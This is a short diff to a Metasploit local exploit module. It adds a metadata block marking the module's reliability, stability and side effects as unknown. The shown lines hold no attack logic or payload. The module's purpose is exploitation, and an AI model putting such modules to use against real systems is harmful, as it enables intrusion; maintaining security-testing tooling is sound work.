@@ -53,6 +53,11 @@ class MetasploitModule < Msf::Exploit::Local
               stdapi_sys_config_getenv
             ]
           }
+        },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         }
       )
     )
